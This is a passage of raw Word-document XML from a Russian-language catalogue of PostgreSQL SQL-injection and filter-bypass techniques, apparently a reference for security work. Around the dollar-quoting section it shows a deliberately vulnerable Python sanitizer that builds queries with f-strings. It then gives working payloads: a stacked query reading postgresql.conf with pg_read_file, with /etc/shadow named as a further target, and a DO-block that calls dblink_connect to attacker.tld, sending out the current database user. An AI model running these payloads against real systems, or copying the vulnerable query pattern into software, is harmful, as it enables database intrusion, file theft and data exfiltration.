          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/* /* */ */</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> как нестандартный комментарий — формально пересекаются. Закреплено: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/**/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для обхода whitespace-фильтра — в 3.9.6 (это обход символьного фильтра, конкретный случай); </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/* /* */ */</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для обхода </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>парсера</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> комментариев — в 3.12.1 (это lexical edge case PG-парсера, не WAF-обход).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="214BF169" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.16 (identifier injection в plpgsql) vs 3.9</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — 3.9 — про обход input-фильтра. 3.16 — про injection в серверный код. Разные слои; пересечений нет.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79791232" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.5 (CVE-2025-1094) vs 3.9.7</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — 3.9.7 — это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>краткое упоминание</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CVE в контексте обхода фильтрации: формально CVE-2025-1094 — bug в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>PQescapeLiteral</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>PQescapeIdentifier</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, который превращает «защищённый» (правильно escape-нутый) payload в SQL injection при невалидном UTF-8. Полная хронология, цепочка с COPY TO PROGRAM (R21), CVSS score, патч-окно — в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.5</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34BC0C30" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Привилегии</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D2C6960" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Категория 3.9 — про </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>доставку</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> payload-а через WAF, привилегии целевой роли определяются итоговой категорией атаки. Например: 3.9.1 (dollar-quoted) поверх 3.6.1 </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">(dblink OOB) требует, чтобы у роли была USAGE на dblink (PUBLIC после </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE EXTENSION</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">); 3.9.1 поверх 3.7.1 (COPY FROM PROGRAM) — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_execute_server_program</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> или SUPERUSER. См. соответствующие категории.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BD35CD9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>3.9.1 Dollar-quoted strings $$...$$ и $tag$...$tag$</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="169DA390" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Уязвимый код — см. 3.9.0.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38987DAA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Что блокирует фильтр.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Класс правил, который пробивается этим приёмом, — не pattern-based WAF из 3.9.0 (там dollar-quoting не помогает напрямую), а:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D19BEFE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Apostrophe-escaping sanitizer</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — самописная функция в legacy-коде, которая «защищает» от инъекций удвоением апострофа: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>value = value.replace("'", "''")</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Логика: «если в payload не будет одиночных </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:t>, то нельзя ни закрыть строку, ни инжектировать». Sanitizer не знает про dollar-quoting.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC1071D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Count-based WAF-эвристика</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — правило вида «отклонить запрос, если количество </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в значении параметра нечётное (unbalanced quote)» или «отклонить, если </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>''</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> встречается ≥ N раз». Часть rule-set Imperva и старых ModSecurity-конфигов; неактивна в современных CRS, но встречается в наследии.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B3AD281" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Stacked queries блокированы extended-протоколом</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (3.5) — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>DO $$ BEGIN ... END $$</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> упаковывает целую plpgsql-программу в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>одну</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SQL-команду, которая проходит через extended protocol (один Parse/Bind/Execute). Это не про обход апострофного фильтра — это про обход ограничения «одна команда на запрос».</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AAA7926" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Payload A — обход apostrophe-escape sanitizer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78F6A249" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Допустим, между приложением и БД стоит самописная sanitize-функция, защищающая ORDER BY (где параметризация драйвером не работает):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28BCB18C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>def sanitize(value: str) -&gt; str:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F41868" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    return value.replace("'", "''")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="545931BC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CD5DEF9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t># ... uses:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33D7E2F4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>order_by = sanitize(request.args["order"])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C2A8513" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>query = text(f"SELECT id, title FROM articles ORDER BY {order_by} LIMIT 10")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06403353" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Payload в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>order</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67FDAFB9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>title; SELECT pg_read_file($$/etc/postgresql/16/main/postgresql.conf$$, 0, 50000)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A4B2B5F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Sanitizer пропускает — нет ни одного </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Что в результате доходит до сервера:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00CB82DA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT id, title FROM articles</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A67A689" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ORDER BY title; SELECT pg_read_file($$/etc/postgresql/16/main/postgresql.conf$$, 0, 50000) LIMIT 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="156C983C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">PG парсит как две команды (stacked, см. 3.5 — работает в simple-protocol psycopg2/asyncpg без params). Вторая команда читает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>postgresql.conf</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> через dollar-quoted строку — sanitizer её не тронул, и payload не нуждается в апострофах.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0218F933" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Аналогично для других целей — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$$dblink_connect arg$$</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$$/etc/shadow$$</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$$host=evil.tld$$</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="131CC89F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Payload B — DO-блок как одна команда (extended protocol bypass)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5249489A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Когда драйвер в extended protocol (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-stacked заблокирован сервером, см. 3.5), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>DO $$ BEGIN ... END $$</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> упаковывает произвольный plpgsql-код в одну SQL-команду. Это критично, потому что внутри плpgsql-блока можно делать всё, что обычно требует stacked queries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6073240E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Контекст: инъекция в SELECT-эндпоинт, драйвер использует extended (например, asyncpg с параметрами; см. 3.5.3). Точка инъекции — поле, не обёрнутое в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:t>, например в LIMIT или в имени таблицы.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C3B2905" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Payload:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A168ED" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>1; DO $do$ BEGIN PERFORM dblink_connect($conn$host=attacker.tld port=5432 user=$conn$ || current_user || $conn$ dbname=x password=x$conn$); END $do$</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F432A34" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Что в результате доходит до сервера:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB7127D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT id, title FROM articles LIMIT 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="604D1A27" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>DO $do$</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08F134B8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>BEGIN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2880358F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  PERFORM dblink_connect(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59938A10" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    $conn$host=attacker.tld port=5432 user=$conn$</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C245CDC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    || current_user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A0B1D9D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    || $conn$ dbname=x password=x$conn$</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="477C0AFE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  );</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CBE8EE2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>END $do$</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="357C616C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>DO $do$ ... $do$</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — синтаксически одна команда. Если она прошла к серверу как часть строки в simple-protocol, она исполнится; если драйвер в extended — две </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
